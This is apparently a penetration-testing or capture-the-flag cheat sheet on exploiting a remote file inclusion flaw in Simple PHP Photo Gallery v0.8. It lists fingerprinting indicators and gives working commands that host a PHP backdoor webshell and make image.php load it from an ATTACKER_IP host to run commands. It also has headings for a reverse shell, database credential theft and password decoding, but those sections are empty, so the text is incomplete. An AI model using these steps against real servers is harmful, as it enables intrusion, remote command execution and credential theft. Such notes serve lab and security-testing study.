Simple PHP Photo Gallery

Simple PHP Photo Gallery v0.8 on Apache/PHP can allow remote file inclusion through image.php, leading to command execution as the web server user.

Discovery

Useful indicators:

80/tcp open  http  Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-title: Simple PHP Photo Gallery

WhatWeb may show:

Apache[2.4.6], PHP[5.4.16], Title[Simple PHP Photo Gallery], X-Powered-By[PHP/5.4.16]

The application version can appear on the main page:

Simple PHP Photo Gallery v0.8

RFI to Webshell

Host a PHP webshell:

cp /usr/share/webshells/php/simple-backdoor.php .
sudo python3 -m http.server 80

Trigger the RFI through the img parameter: Other versions the RFI is in the i parameter:

curl "http://TARGET/image.php?img=http://ATTACKER_IP/simple-backdoor.php&cmd=id"
curl "http://TARGET/image.php?i=http://ATTACKER_IP/simple-backdoor.php&cmd=id"

Successful command execution:

Reverse Shell

Create a shell script:

Fetch and execute it through the RFI webshell:

Because the shell script sleeps before connecting back, stop the HTTP server after triggering it and start the listener on the same port:

Database Credentials

Read the gallery database config:

Useful values:

If remote MySQL denies the attacker host, use the credentials locally from the web shell:

Dump the gallery users:

Observed passwords were base64 encoded twice: